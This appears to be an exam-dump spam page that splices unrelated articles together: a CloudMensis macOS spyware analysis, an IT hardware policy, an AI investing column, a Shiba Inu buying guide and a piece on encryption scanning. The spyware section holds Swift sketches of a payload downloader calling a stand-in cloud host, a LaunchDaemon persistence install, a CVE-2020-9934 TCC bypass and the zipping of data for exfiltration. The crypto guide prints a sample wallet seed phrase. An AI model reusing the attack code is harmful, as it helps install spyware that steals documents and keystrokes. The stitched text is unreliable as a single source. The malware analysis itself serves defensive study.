Trust these 9L0-619 practice questions and go for the actual test.

When you search the web for 9L0-619 eBooks, you will find a huge number of them available free of cost, but they are outdated and you will risk your precious time and money. Go directly to killexams.com and download the 100% free 9L0-619 questions PDF sample. Evaluate it, then register for the full version. Practice the 9L0-619 dumps and pass the exam.

Exam Code: 9L0-619 Practice exam 2022 by Killexams.com team
Mac OS X Deployment v10.5
Apple Deployment information search
I see what you did there: A look at the CloudMensis macOS spyware

Previously unknown macOS malware uses cloud storage as its C&C channel and to exfiltrate documents, keystrokes, and screen captures from compromised Macs

In April 2022, ESET researchers discovered a previously unknown macOS backdoor that spies on users of the compromised Mac and exclusively uses public cloud storage services to communicate back and forth with its operators. Following analysis, we named it CloudMensis. Its capabilities clearly show that the intent of its operators is to gather information from the victims’ Macs by exfiltrating documents, keystrokes, and screen captures.

Apple has recently acknowledged the presence of spyware targeting users of its products and is previewing Lockdown Mode on iOS, iPadOS and macOS, which disables features frequently exploited to gain code execution and deploy malware. Although not the most advanced malware, CloudMensis may be one of the reasons some users would want to enable this additional defense. Disabling entry points, at the expense of a less fluid user experience, sounds like a reasonable way to reduce the attack surface.

This blogpost describes the different components of CloudMensis and their inner workings.

CloudMensis overview

CloudMensis is malware for macOS developed in Objective-C. Samples we analyzed are compiled for both Intel and Apple silicon architectures. We still do not know how victims are initially compromised by this threat. However, we understand that when code execution and administrative privileges are gained, what follows is a two-stage process (see Figure 1), where the first stage downloads and executes the more featureful second stage. Interestingly, this first-stage malware retrieves its next stage from a cloud storage provider. It doesn’t use a publicly accessible link; it includes an access token to download the MyExecute file from the drive. In the sample we analyzed, pCloud was used to store and deliver the second stage.
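
As a concrete illustration, a stage-one downloader of this kind boils down to a handful of lines. The sketch below is hypothetical: the host, path, and authorization header are placeholders rather than pCloud's real API, but the embedded-token pattern and the destination path follow the article.

```swift
import Foundation

// Hypothetical sketch of the stage-one behavior described above: fetch the
// second-stage Mach-O from cloud storage using an access token embedded in
// the binary (not a public link), then write it where launchd will find it.
// The host and auth header are placeholders, not pCloud's actual API.
let token = "EMBEDDED_ACCESS_TOKEN"
var request = URLRequest(url: URL(string: "https://cloud.example.com/files/MyExecute")!)
request.setValue("Bearer \(token)", forHTTPHeaderField: "Authorization")

URLSession.shared.dataTask(with: request) { data, _, _ in
    guard let data = data else { return }
    let dest = URL(fileURLWithPath: "/Library/WebServer/share/httpd/manual/WindowServer")
    try? data.write(to: dest)   // requires the admin privileges noted below
}.resume()
```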

Figure 1. Outline of how CloudMensis uses cloud storage services

Artifacts left in both components suggest they are called execute and Client by their authors, the former being the downloader and the latter the spy agent. Those names are found both in the objects’ absolute paths and ad hoc signatures.

Figure 2. Partial strings and code signature from the downloader component, execute

Figure 3. Partial strings and code signature from the spy agent component, Client

Figures 2 and 3 also show what appear to be internal names of the components of this malware: the project seems to be called BaD and interestingly resides in a subdirectory named LeonWork. Further, v29 suggests this sample is version 29, or perhaps 2.9. This version number is also found in the configuration filename.

The downloader component

The first-stage malware downloads and installs the second-stage malware as a system-wide daemon. As seen in Figure 4, two files are written to disk:

  1. /Library/WebServer/share/httpd/manual/WindowServer: the second-stage Mach-O executable, obtained from the pCloud drive
  2. /Library/LaunchDaemons/.com.apple.WindowServer.plist: a property list file to make the malware persist as a system-wide daemon

At this stage, the attackers must already have administrative privileges because both directories can only be modified by the root user.
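
What that installation amounts to can be sketched in a few lines of Swift. The label and paths come from the article; the exact contents of the real plist were not published, so the (standard) launchd keys used here are an assumption.

```swift
import Foundation

// Sketch of the persistence step described above. The label and file paths
// come from the article; the rest is an approximation of a typical daemon plist.
let daemon: [String: Any] = [
    "Label": "com.apple.WindowServer",   // masquerades as an Apple component
    "ProgramArguments": ["/Library/WebServer/share/httpd/manual/WindowServer"],
    "RunAtLoad": true                    // launchd starts the agent at boot
]

do {
    let data = try PropertyListSerialization.data(fromPropertyList: daemon,
                                                  format: .xml,
                                                  options: 0)
    // Writing here requires root: /Library/LaunchDaemons is owned by root.
    try data.write(to: URL(fileURLWithPath: "/Library/LaunchDaemons/.com.apple.WindowServer.plist"))
} catch {
    print("install failed: \(error)")
}
```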

Figure 4. CloudMensis downloader installing the second stage

Cleaning up after usage of a Safari exploit

The first-stage component includes an interesting method called removeRegistration that seems to be present to clean up after a successful Safari sandbox escape exploit. A first glance at this method is a bit puzzling considering that the things it does seem unrelated: it deletes a file called root from the EFI system partition (Figure 5), sends an XPC message to speechsynthesisd (Figure 6), and deletes files from the Safari cache directory. We initially thought the purpose of removeRegistration was to uninstall previous versions of CloudMensis, but further research showed that these files are used to launch sandbox and privilege escalation exploits from Safari while abusing four vulnerabilities. These vulnerabilities were discovered and well documented by Niklas Baumstark and Samuel Groß in 2017. All four were patched by Apple the same year, so this distribution technique is probably not used to install CloudMensis anymore. This could explain why this code is no longer called. It also suggests that CloudMensis may have been around for many years.

Figure 5. Decompiled code showing CloudMensis mounting the EFI partition

Figure 6. Sending an XPC message to speechsynthesisd

The spy agent component

The second stage of CloudMensis is a much larger component, packed with a number of features to collect information from the compromised Mac. The intention of the attackers here is clearly to exfiltrate documents, screenshots, email attachments, and other sensitive data.

CloudMensis uses cloud storage both for receiving commands from its operators and for exfiltrating files. It supports three different providers: pCloud, Yandex Disk, and Dropbox. The configuration included in the analyzed sample contains authentication tokens for pCloud and Yandex Disk.

Configuration

One of the first things the CloudMensis spy agent does is load its configuration. This is a binary structure that is 14,972 bytes long. It is stored on disk at ~/Library/Preferences/com.apple.iTunesInfo29.plist, encrypted using a simple XOR with a generated key (see the Custom encryption section).

If this file does not already exist, the configuration is populated with default values hardcoded in the malware sample. Additionally, it tries to import values from what seem to be previous versions of the CloudMensis configuration at:

  • ~/Library/Preferences/com.apple.iTunesInfo28.plist
  • ~/Library/Preferences/com.apple.iTunesInfo.plist

The configuration contains the following:

  • Which cloud storage providers to use and authentication tokens
  • A randomly generated bot identifier
  • Information about the Mac
  • Paths to various directories used by CloudMensis
  • File extensions that are of interest to the operators

The default list of file extensions found in the analyzed sample, pictured in Figure 7, shows that operators are interested in documents, spreadsheets, audio recordings, pictures, and email messages from the victims’ Macs. The most uncommon format is perhaps audio recordings using the Adaptive Multi-Rate codec (using the .amr and .3ga extensions), which is specifically designed for speech compression. Other interesting file extensions in this list are .hwp and .hwpx files, which are documents for Hangul Office (now Hancom Office), a popular word processor among Korean speakers.

Figure 7. File extensions found in the default configuration of CloudMensis

Custom encryption

CloudMensis implements its own encryption function that its authors call FlowEncrypt. Figure 8 shows the disassembled function. It takes a single byte as a seed and generates the rest of the key by performing a series of operations on the most recently generated byte.  The input is XORed with this keystream. Ultimately the current byte’s value will be the same as one of its previous values, so the keystream will loop. This means that even though the cipher seems complex, it can be simplified to an XOR with a static key (except for the first few bytes of the keystream, before it starts looping).
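
ESET did not publish the exact byte operations, so the sketch below substitutes a placeholder transformation. What it illustrates is the structure of the scheme: each key byte is derived only from the previous one, so the keystream inevitably cycles, and the whole cipher collapses to XOR with a repeating key.

```swift
// Schematic stand-in for FlowEncrypt. `nextByte` is NOT the malware's real
// transformation; any function of only the previous byte behaves the same way.
func nextByte(_ previous: UInt8) -> UInt8 {
    return previous &* 13 &+ 37   // placeholder ops (&* and &+ wrap on overflow)
}

func flowEncryptStyle(_ input: [UInt8], seed: UInt8) -> [UInt8] {
    var key = seed
    return input.map { byte in
        key = nextByte(key)       // keystream depends only on the last key byte...
        return byte ^ key         // ...so it loops: effectively XOR with a static key
    }
}

// XOR is symmetric, so the same call encrypts and decrypts:
let plaintext = Array("configuration".utf8)
let ciphertext = flowEncryptStyle(plaintext, seed: 0x5A)
assert(flowEncryptStyle(ciphertext, seed: 0x5A) == plaintext)
```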

Figure 8. Disassembled FlowEncrypt method

Bypassing TCC

Since the release of macOS Mojave (10.14) in 2018, access to some sensitive inputs, such as screen captures, cameras, microphones and keyboard events, has been protected by a system called TCC, which stands for Transparency, Consent, and Control. When an application tries to access certain functions, macOS prompts the user, who can grant or refuse access, to decide whether the request is legitimate. Ultimately, TCC rules are saved into a database on the Mac. This database is protected by System Integrity Protection (SIP) to ensure that only the TCC daemon can make any changes.

CloudMensis uses two techniques to bypass TCC (thus avoiding prompting the user), thereby gaining access to the screen, being able to scan removable storage for documents of interest, and being able to log keyboard events. If SIP is disabled, the TCC database (TCC.db) is no longer protected against tampering; in this case, CloudMensis adds entries to grant itself permissions before using sensitive inputs. If SIP is enabled but the Mac is running any version of macOS Catalina earlier than 10.15.6, CloudMensis will exploit a vulnerability to make the TCC daemon (tccd) load a database CloudMensis can write to. This vulnerability is known as CVE-2020-9934 and was reported and described by Matt Shockley in 2020.

The exploit first creates a new database under ~/Library/Application Support/com.apple.spotlight/Library/Application Support/com.apple.TCC/ unless it was already created, as shown in Figure 9.

Figure 9. Checking if the illegitimate TCC database file already exists

Then, it sets the HOME environment variable to ~/Library/Application Support/com.apple.spotlight using launchctl setenv, so that the TCC daemon loads the alternate database instead of the legitimate one. Figure 10 shows how it is done using NSTask.
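
A minimal sketch of that sequence, assuming the same approach as Shockley's public proof of concept (the exact way CloudMensis restarts tccd may differ):

```swift
import Foundation

// CVE-2020-9934 sketch: point launchd's HOME at an attacker-controlled
// directory, then restart tccd so it loads the writable TCC.db from there.
// Patched in macOS Catalina 10.15.6; shown only to illustrate the flow.
let fakeHome = ("~/Library/Application Support/com.apple.spotlight" as NSString)
    .expandingTildeInPath

func run(_ path: String, _ args: [String]) throws {
    let task = Process()              // NSTask is bridged to Process in Swift
    task.executableURL = URL(fileURLWithPath: path)
    task.arguments = args
    try task.run()
    task.waitUntilExit()
}

do {
    try run("/bin/launchctl", ["setenv", "HOME", fakeHome])  // mangle launchd's HOME
    try run("/usr/bin/killall", ["tccd"])                    // force tccd to re-read it
} catch {
    print("exploit step failed: \(error)")
}
```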

Figure 10. Mangling the HOME environment variable used by launchd with launchctl and restarting tccd

Communication with the C&C server

To communicate back and forth with its operators, the CloudMensis configuration contains authentication tokens to multiple cloud service providers. Each entry in the configuration is used for a different purpose. All of them can use any provider supported by CloudMensis. In the analyzed sample, Dropbox, pCloud, and Yandex Disk are supported.

The first store, called CloudCmd by the malware authors according to the global variable name, is used to hold commands transmitted to bots and their results. Another, which they call CloudData, is used to exfiltrate information from the compromised Mac. A third one, which they call CloudShell, is used for storing shell command output. However, this last one uses the same settings as CloudCmd.

Before it tries fetching remote files, CloudMensis first uploads an RSA-encrypted report about the compromised Mac to /January/ on CloudCmd. This report includes shared secrets such as a bot identifier and a password to decrypt to-be-exfiltrated data.

Then, to receive commands, CloudMensis fetches files under the following directory in the CloudCmd storage: /Febrary/<bot_id>/May/. Each file is downloaded, decrypted, and dispatched to the AnalizeCMDFileName method. Notice how both February and Analyze are spelled incorrectly by the malware authors.

The CloudData storage is used to upload larger files requested by the operators. Before the upload, most files are added to a password-protected ZIP archive. Generated when CloudMensis is first launched, the password is kept in the configuration, and transferred to the operators in the initial report.
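
The MITRE table at the end of this article notes that CloudMensis uses the SSZipArchive library for this step. A minimal sketch of the packaging call, with placeholder paths and password:

```swift
import SSZipArchive   // via the SSZipArchive library

// Package staged files into a password-protected ZIP before upload. The
// password is generated at first launch and shared with the operators in
// the initial RSA-encrypted report; these values are placeholders.
let stagedDirectory = "/tmp/staged-documents"
let archivePath = "/tmp/exfil.zip"
let password = "generated-at-first-launch"

let ok = SSZipArchive.createZipFile(atPath: archivePath,
                                    withContentsOfDirectory: stagedDirectory,
                                    withPassword: password)
print(ok ? "archive ready for upload" : "zip failed")
```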

Commands

There are 39 commands implemented in the analyzed CloudMensis sample. They are identified by a number between 49 and 93 inclusive, excluding 57, 78, 87, and 90 to 92. Some commands require additional arguments. Commands allow the operators to perform actions such as:

  • Change values in the CloudMensis configuration: cloud storage providers and authentication tokens, file extensions deemed interesting, polling frequency of cloud storage, etc.
  • List running processes
  • Start a screen capture
  • List email messages and attachments
  • List files from removable storage
  • Run shell commands and upload output to cloud storage
  • Download and execute arbitrary files

Figure 11 shows command with identifier 84, which lists all jobs loaded by launchd and uploads the results now or later, depending on the value of its argument.

Figure 11. Command 84 runs launchctl list to get launchd jobs
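
Stripped of the upload logic, a handler like command 84 reduces to running launchctl and capturing its output. A rough sketch, assuming a plain subprocess call:

```swift
import Foundation

// Run `launchctl list` and return its stdout, ready to be staged for upload.
func listLaunchdJobs() throws -> String {
    let task = Process()
    task.executableURL = URL(fileURLWithPath: "/bin/launchctl")
    task.arguments = ["list"]
    let pipe = Pipe()
    task.standardOutput = pipe
    try task.run()
    task.waitUntilExit()
    let output = pipe.fileHandleForReading.readDataToEndOfFile()
    return String(decoding: output, as: UTF8.self)
}
```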

Figure 12 shows a more complex example. Command with identifier 60 is used to launch a screen capture. If the first argument is 1, the second argument is a URL to a file that will be downloaded, stored, and executed by startScreenCapture. This external executable file will be saved as windowserver in the Library folder of FaceTime’s sandbox container. If the first argument is zero, it will launch the existing file previously dropped. We could not find samples of this screen capture agent.

Figure 12. Command 60: Start a screen capture

It’s interesting to note that property list files to make launchd start new processes, such as com.apple.windowServer.plist, are not persistent: they are deleted from disk after they are loaded by launchd.

Metadata from cloud storage

Metadata from the cloud storages used by CloudMensis reveals interesting details about the operation. Figure 13 shows the tree view of the storage used by CloudMensis to send the initial report and to transmit commands to the bots as of April 22nd, 2022.

Figure 13. Tree view of the directory listing from the CloudCmd storage

This metadata gave partial insight into the operation and helped draw a timeline. First, the pCloud accounts were created on January 19th, 2022. The directory listing from April 22nd  shows that 51 unique bot identifiers created subdirectories in the cloud storage to receive commands. Because these directories are created when the malware is first launched, we can use their creation date to determine the date of the initial compromise, as seen in Figure 14.

Figure 14. Subdirectory creation dates under /Febrary (sic)

This chart shows a spike of compromises in early March 2022, with the first being on February 4th. The last spike may be explained by sandboxes running CloudMensis, once it was uploaded to VirusTotal.

Conclusion

CloudMensis is a threat to Mac users, but its very limited distribution suggests that it is used as part of a targeted operation. From what we have seen, operators of this malware family deploy CloudMensis to specific targets that are of interest to them. Usage of vulnerabilities to work around macOS mitigations shows that the malware operators are actively trying to maximize the success of their spying operations. At the same time, no undisclosed vulnerabilities (zero-days) were found to be used by this group during our research. Thus, running an up-to-date Mac is recommended to avoid, at least, the mitigation bypasses.

We still do not know how CloudMensis is initially distributed and who the targets are. The general quality of the code and lack of obfuscation show that the authors may not be very familiar with Mac development and are not so advanced. Nonetheless, a lot of resources were put into making CloudMensis a powerful spying tool and a menace to potential targets.

IoCs

Files

SHA-1 | Filename | Description | ESET detection name
D7BF702F56CA53140F4F03B590E9AFCBC83809DB | mdworker3 | Downloader (execute) | OSX/CloudMensis.A
0AA94D8DF1840D734F25426926E529588502BC08 | WindowServer, myexe | Spy agent (Client) | OSX/CloudMensis.A
C3E48C2A2D43C752121E55B909FC705FE4FDAEF6 | WindowServer, MyExecute | Spy agent (Client) | OSX/CloudMensis.A

Public key

-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsGRYSEVvwmfBFNBjOz+Q
pax5rzWf/LT/yFUQA1zrA1njjyIHrzphgc9tgGHs/7tsWp8e5dLkAYsVGhWAPsjy
1gx0drbdMjlTbBYTyEg5Pgy/5MsENDdnsCRWr23ZaOELvHHVV8CMC8Fu4Wbaz80L
Ghg8isVPEHC8H/yGtjHPYFVe6lwVr/MXoKcpx13S1K8nmDQNAhMpT1aLaG/6Qijh
W4P/RFQq+Fdia3fFehPg5DtYD90rS3sdFKmj9N6MO0/WAVdZzGuEXD53LHz9eZwR
9Y8786nVDrlma5YCKpqUZ5c46wW3gYWi3sY+VS3b2FdAKCJhTfCy82AUGqPSVfLa
mQIDAQAB
-----END PUBLIC KEY-----

Paths used

  • /Library/WebServer/share/httpd/manual/WindowServer
  • /Library/LaunchDaemons/.com.apple.WindowServer.plist
  • ~/Library/Containers/com.apple.FaceTime/Data/Library/windowserver
  • ~/Library/Containers/com.apple.Notes/Data/Library/.CFUserTextDecoding
  • ~/Library/Containers/com.apple.languageassetd/loginwindow
  • ~/Library/Application Support/com.apple.spotlight/Resources_V3/.CrashRep

MITRE ATT&CK techniques

This table was built using version 11 of the MITRE ATT&CK framework.

Tactic | ID | Name | Description
Persistence | T1543.004 | Create or Modify System Process: Launch Daemon | The CloudMensis downloader installs the second stage as a system-wide daemon.
Defense Evasion | T1553 | Subvert Trust Controls | CloudMensis tries to bypass TCC if possible.
Collection | T1560.002 | Archive Collected Data: Archive via Library | CloudMensis uses SSZipArchive to create a password-protected ZIP archive of data to exfiltrate.
Collection | T1056.001 | Input Capture: Keylogging | CloudMensis can capture and exfiltrate keystrokes.
Collection | T1113 | Screen Capture | CloudMensis can take screen captures and exfiltrate them.
Collection | T1005 | Data from Local System | CloudMensis looks for files with specific extensions.
Collection | T1025 | Data from Removable Media | CloudMensis can search removable media for interesting files upon their connection.
Collection | T1114.001 | Email Collection: Local Email Collection | CloudMensis searches for interesting email messages and attachments from Mail.
Command and Control | T1573.002 | Encrypted Channel: Asymmetric Cryptography | The CloudMensis initial report is encrypted with a public RSA-2048 key.
Command and Control | T1573.001 | Encrypted Channel: Symmetric Cryptography | CloudMensis encrypts exfiltrated files using password-protected ZIP archives.
Command and Control | T1102.002 | Web Service: Bidirectional Communication | CloudMensis uses Dropbox, pCloud, or Yandex Disk for C&C communication.
Exfiltration | T1567.002 | Exfiltration Over Web Service: Exfiltration to Cloud Storage | CloudMensis exfiltrates files to Dropbox, pCloud, or Yandex Disk.
ITS Deployment Guide
Killexams : ITS Deployment Guide

Full-time faculty and staff are currently on a five-year computer lifecycle.  When your computer reaches this age, you will receive an email to provide information on your specifications for a new computer.

The current replacement year is: FY14.

If your computer is FY14 or older and you are a full-time faculty or staff member and have not received a communication, please contact the Help Desk.

Older machines that are assigned to adjunct, part-time, or work-study positions are not replaced with new machines.  If you believe one of these machines should be replaced because of performance issues or specific work requirements, please contact the Help Desk with your request and justification.  We will review your request and may assign a second-life machine as a replacement.  (Second-life machines will generally be newer than the model you currently have, but not a brand new machine.)

Changes to Deployment Policy

Starting in 2013, full-time faculty and staff have their choice of either an Apple or Dell laptop or desktop subject to the following guidelines:

1. The University is no longer providing dual-boot computers with both the Windows and Mac OS X operating systems. If you choose an Apple computer, you will only have the Mac operating system installed. If you need Windows, you must choose a Dell computer.
 
2. If you choose a laptop, you will only be provided with a mouse upon request. All additional peripherals (external keyboard, monitor, scanner, etc.) must be paid for with departmental funds.
 
3. All old computers must be returned to IT when the new computer is deployed. There is no option to keep your old computer in addition to your new computer or to opt out of the new deployment. The lifecycle is in place to remove old computers that continue to put a heavy strain on support resources and create security risks on campus.
 
4. Any hardware enhancements and non-standard software must also be purchased with departmental funds.
Artificial Intelligence may be the future but treat it with care
Killexams : Artificial Intelligence may be the future but treat it with care

Many people believe that you should only invest in what you know. But it is wise occasionally to break this rule and step outside your comfort zone into new worlds, like the crazy kingdom of TikTok, the Chinese video app.

You may not be enamoured of its cat videos, although you may have appreciated this week's advice on how to stay cool in a heatwave, such as placing a bowl of ice cubes in front of a fan. 

But, for the sake of your portfolio, it's worth being interested in how this app, dubbed 'supremely addictive' by The Economist, has attracted 1 billion users worldwide. 

This is thanks to the deft, relentless deployment of machine learning and natural language processing (NLP), which are subsets of artificial intelligence. 

Artificial Intelligence (AI) powers voice assistants like Amazon's Alexa and Apple's Siri, and the Google search engine. Its other uses – they are multiplying all the time – include crime prevention, farming, financial advice, fraud detection, weather forecasting and self-driving cars. 

AI is forecast to play a huge role in healthcare, as spending constraints force the more effective allocation of budgets. Last year Microsoft paid $19billion for voice recognition firm Nuance Communications whose NLP systems enable the transcription of speech during visits to the doctor. 

The Sanlam Artificial Intelligence fund holds Alphabet, Microsoft and about 30 other stocks, chosen from 20,000 candidates in a process that relies on AI early on. Fund manager Chris Ford says the long-term impact is likely to be 'similar to that of the railways, telephone or television'. 

He continues: 'AI is a disinflationary force because it allows scarce resources to be deployed very efficiently: AI systems can work 24/7. Surging inflation and the cost of labour in the West will increase AI adoption, as companies try to contain prices.' 

You may be filled with apprehension about the long-term implications of AI. 

A new book, Machines Behaving Badly: The Morality of AI, by computer scientist Toby Walsh, will be one of my summer reads. But I will still be looking for long-term opportunities in AI, as the recent stock market rout has slashed the share prices of companies in the sector. 

Shares in Deere, the agricultural equipment group, which offers an autonomous tractor, are down 19 per cent this year. 

Shares in Nvidia, the AI hardware and software group, are down by 48 per cent to $152, but US bank Citigroup rates the shares a buy. Given the complexity of assessing the credentials of this and other AI businesses, I will be depending on the judgment calls made by managers of specialist funds. 


Some, like iShares Automation & Robotics and L&G ROBO Global Robotics and Automation, invest in the allied field of robotics, where machines work on commands or on their own memory. 

Some, like Sanlam's sister fund, Asia Pacific Artificial Intelligence, focus on that region where belief in AI's potential and an abundance of STEM (science, technology, engineering and mathematics) graduates are powering explosive growth.

Other funds own companies that supply the essential kit for this expansion. The largest holding at Temit (Templeton Emerging Market Investment Trust) is Taiwan Semiconductor Manufacturing Company (TSMC), maker of the best AI microchips. 

These can carry out parallel computations rather than just sequential ones. Andrew Ness, Temit's co-manager, says it is thanks to such chips that 'smart devices today can capture, process, and react to information independently'. Shares in Temit are at a 14 per cent discount to the net value of its assets.

If you are venturing into AI funds, check whether you already have money in some of their popular holdings, such as Ocado, the online supermarket. Ocado uses AI 'to make possible in seconds, what thousands of humans working together can't'. Despite this, its shares have halved this year, highlighting that if you want to back AI, you need patience and the ability to suffer losses. 

Sanlam has a stake in Tesla whose shares have also tumbled. 

Anyone – like me – with money in the Scottish Mortgage Investment Trust, another Tesla backer, must hope that Elon Musk can deliver on his big promises for autonomous vehicles. 

Shares in Scottish Mortgage are recovering from a slump primarily caused by concerns over the valuation of its large unlisted segment. This encompasses ByteDance, TikTok's parent, which was hit by the Chinese state's crackdown on tech companies. 

Allocating investments to AI is a leap of faith. But this tech revolution will not be reversed, no matter how disturbing some may find its possible consequences. 


How To Buy Shiba Inu Coin In A Trust Wallet

An emerging cryptocurrency called Shiba Inu (SHIB) offers an Ethereum-based alternative to Dogecoin (DOGE), another popular and fashionable meme coin. Using Trust Wallet, a crypto and Bitcoin wallet, together with Uniswap, you can easily purchase Shiba Inu coin from any location on the globe. The Shiba Inu token is another flourishing cryptocurrency that is now very well liked, but novice cryptocurrency users might be unsure where to buy it. Without further ado, let's dive in!

Shiba Inu is a cryptocurrency that runs on Ethereum's blockchain. It was quietly released in August 2020 by a person or group going by the moniker Ryoshi and was meant to take the place of the well-known Dogecoin.

The Shiba Inu, a Japanese dog breed, serves as the mascot for both Shiba Inu and Dogecoin, and SHIB is widely referred to as "the Dogecoin killer." In terms of usefulness, the cryptocurrency serves more as a tradable token than anything else. ShibaSwap is the name of the exchange ecosystem that underpins it.

Shiba may be purchased on both centralised and decentralised exchanges. If you already use a centralised exchange, like eToro, you can move on to the next stage.

For certain cryptocurrencies, like Shiba, decentralised exchanges (DEXs) are the way to go because they are compatible with almost all Ethereum-based assets. Uniswap is the best-known provider in this situation. Uniswap has more than $2 billion locked up in its protocols, and the platform is presently used by a large number of investors to manage their Ethereum-based tokens.

A particular software wallet, such as MetaMask or Coinbase Wallet, is required while utilising DEX. In contrast to other centralised exchanges, these crypto wallets are free to use and let you keep control of your money.

First of all, you should look into the price forecasts for SHIB; if the trend seems to be rising, you may decide to buy. As you may know, Shiba functions on the Ethereum blockchain, therefore one method is to purchase ETH and exchange it for SHIB. For this lesson, you need both a Coinbase account and the Trust Wallet app in order to access Uniswap (a decentralised cryptocurrency exchange).

Installing the Trust Wallet app on your Android or Apple phone is the first step. Then register for an account in the app. PancakeSwap, a DApp accessible from the app, also allows you to convert Bitcoin or USDT to Shiba Inu coin.

This is how you use a Trust Wallet to buy and sell Shiba Inu coins.

Trust Wallet is the successful official crypto wallet established and overseen by Binance. Trust Wallet is a useful programme for cryptocurrency users: it is the best option for those who want to securely send, receive, and store Bitcoin, Ethereum, or any other cryptocurrency.

The wallet plays a key role in keeping you in control of your crypto. It enables you to use the most recent DApps and DeFi platforms and to play blockchain games. Trust Wallet is a quick, secure multi-cryptocurrency wallet with support for the Binance DEX, designed with portability and asset privacy in mind. Trust Wallet offers consumers a top-notch experience and is intended to be the ideal secure wallet app:

  • Trust wallet is a non-custodial wallet, which enables you to control your wallet’s private keys. Although Trust Wallet primarily supports Ethereum, it also provides a wide array of other digital currencies and blockchains. Trust wallet supports a variety of different chains and decentralised apps on those blockchains, including Ethereum, Polygon,  Binance Smart Chain, Avalanche,  and many others.
  • Another cryptocurrency wallet that supports several blockchains is the Trust wallet. Therefore, the Trust wallet software may be used to store several cryptocurrencies. Let’s use the Trust wallet to establish a bitcoin wallet now. The steps are listed below.
  • If you have never created a wallet before, do it now. To create a new wallet, simply click the button and agree to the terms of service.
  • Set your wallet up with a passcode.
  • 12 words will now be displayed to you; write them down and save them securely. Keep them safe and don't provide them to anyone, or you'll lose all of your money. (The walkthrough's example phrase: congress dove bench picnic quick piece conscious client muscle police surface exist.)
  • Verify your secret phrase once again, then click “Done.” You’ve created a bitcoin wallet successfully.
  • Choose the button in the top-right corner, then add any coin or token you choose from the list that appears.
  • Add it by searching for “SHIB.” Shiba Inu ERC20 will be displayed.
  • The SHIBA INU ticker will now be shown in your wallet.

Let’s explore how to purchase Shiba Inu coins straight from the Trust wallet app now that the Trust wallet has been configured.

  • There is a DApp browser in the Trust wallet. In order to purchase Shiba Inu coins or any other currency, we may communicate with decentralised exchanges like Uniswap or Sushiswap. Simply follow the instructions below. To begin with, you must have Ethereum (ETH) in your wallet in order to purchase a Shiba Inu coin and cover transaction costs. A buddy, another wallet, or an exchange like Coinbase, Binance, or Kucoin are all places where you can get Ethereum (ETH).
  • Having ETH in your wallet now, let’s proceed to purchase Shiba Inu currency.
  • Enter the Uniswap exchange URL, which is https://app.uniswap.org/, under the ‘DApps’ tab of your Trust wallet, or choose the Uniswap Exchange under the DeFi category.
  • After you connect your wallet, a Swap dashboard will appear. There, you will also be able to view your ETH balance.
  • Choose ETH on the top bar and SHIB on the bottom bar as we switch from ETH to SHIB. Search for or enter SHIB, then select “Import” to do that. Alternatively, you may just copy and paste this SHIB contract address before selecting “Import.”
  • Type in how much ETH you want to convert to SHIB or how much SHIB you want to purchase. Due to the necessity for some ETH to cover transaction costs, you are unable to input the maximum amount of ETH.
  • Click “Swap,” double-check the information, and then click “Confirm swap.”
  • As you complete the exchange, you will receive a prompt that is a Smart Contract Call. You won't be able to complete the transaction if the "Max Total" is higher than the total value in your wallet; an insufficient Ethereum (ETH) balance is displayed.
  • Be sure that the "Max Total" is less than the amount of ETH that is currently in your wallet. The maximum total equals the amount you wish to trade plus the network cost, which is the Ethereum gas fee. To purchase Shiba Inu on the Trust wallet, you must pay some Ethereum gas costs. This network cost is determined by the quantity of transactions taking place at any given time on the Ethereum network.
  • If everything looks good, click “Confirm.” Your transaction will be performed shortly, and the ‘Wallet’ tab will change to reflect your revised Shiba Inu currency balance.
  • The Shiba Inu coin was successfully purchased with the Trust wallet app. You may exchange your SHIB back into ETH in the same manner, and you can use ETH on Uniswap to purchase any other coin.

The Shiba Inu token is already available on the majority of websites, although most people may not know where to get it from. This article should make it easier to choose among the several cryptocurrency exchanges accessible to buy SHIB. To prevent losses, you must first review the SHIBA INU price forecast before investing.

British intelligence recycles old argument for thwarting strong encryption: Think of the children!

Comment Two notorious characters from the British security services have published a paper that once again suggests breaking strong end-to-end encryption would be a good thing for society. 

Nearly four years ago Ian Levy, technical director of the UK National Cyber Security Centre, along with technical director for cryptanalysis at the British spy agency GCHQ Crispin Robinson, published a paper arguing for "virtual crocodile clips" on encrypted communications that could be used to keep us all safe from harm. On Thursday they gave it another shot, with a new paper pushing a very similar argument, while acknowledging its failings.

"This paper is not a rigorous security analysis, but seeks to show that there exist today ways of countering much of the online child sexual abuse harms, but also to show the scope and scale of the work that remains to be done in this area," they write.

"We have not identified any techniques that are likely to provide as accurate detection of child sexual abuse material as scanning of content, and whilst the privacy considerations that this type of technology raises must not be disregarded, we have presented arguments that suggest that it should be possible to deploy in configurations that mitigate many of the more serious privacy concerns." 

The somewhat dynamic duo argues that to protect against child sexual abuse and the material it produces, it's in everyone's interests if law enforcement has some kind of access to private communications. The same argument has been used many times before, usually against one of the Four Horsemen of the Infocalypse: terrorists, drug dealers, child sexual abuse material (CSAM), and organized crime.

Their proposal is to restart attempts at automated filtering, specifically with service providers – who are ostensibly offering encrypted communications – being asked to insert themselves in the process to check that CSAM isn't being sent around online. This could be performed by AI trained to detect such material. Law enforcement could then be tipped off and work with these companies to crack down on the CSAM scourge.

Apple infamously tried to make the same argument to its users last year before backing down on client-side monitoring. It turns out promising privacy and then admitting you're going to be scanning users' chatter and data isn't a popular selling point.

Apple can't solve it, neither can we

In their latest paper Levy and Robinson argue that this isn't a major issue, since non-governmental organizations could be used to moderate the automatic scanning of personal information for banned material. This would avoid the potential abuse of such a scheme, they argue, and only the guilty would have something to fear.

It's not a new argument, and has been used again and again in the conflict between encryption advocates who like private conversations and governments that don't. Technology experts mostly agree such a system can't be insulated from abuse: the scanning could be backdoored, it could report innocent yet private content as false positives, or it could be gradually expanded to block stuff politicians wish to suppress. Governments would prefer to think otherwise, but the paper does at least acknowledge that people seeking privacy aren't suspects.

"We acknowledge that for some users in some circumstances, anonymity is, in and of itself, a safety feature," Levy and Robinson opine. "We do not seek to suggest that anonymity on commodity services is inherently bad, but it has an effect on the child sexual abuse problem." 

Which is a soft way of saying conversations can be used to plan crimes so they should be monitored. No one's denying the incredible harm that stems from the scum who make CSAM, but allowing monitoring of all private communications – albeit by a third party – seems a very high price to pay.

Apple backed down on its plans to automatically scan users' data for such material in part because it has built its marketing model around selling privacy as a service to customers – although this offer does not apply in China. Therein lies the point: if Apple is willing to let Middle Kingdom mandarins interfere, there's no guarantee that it won't do the same for other nations if it's in the corporate interest.

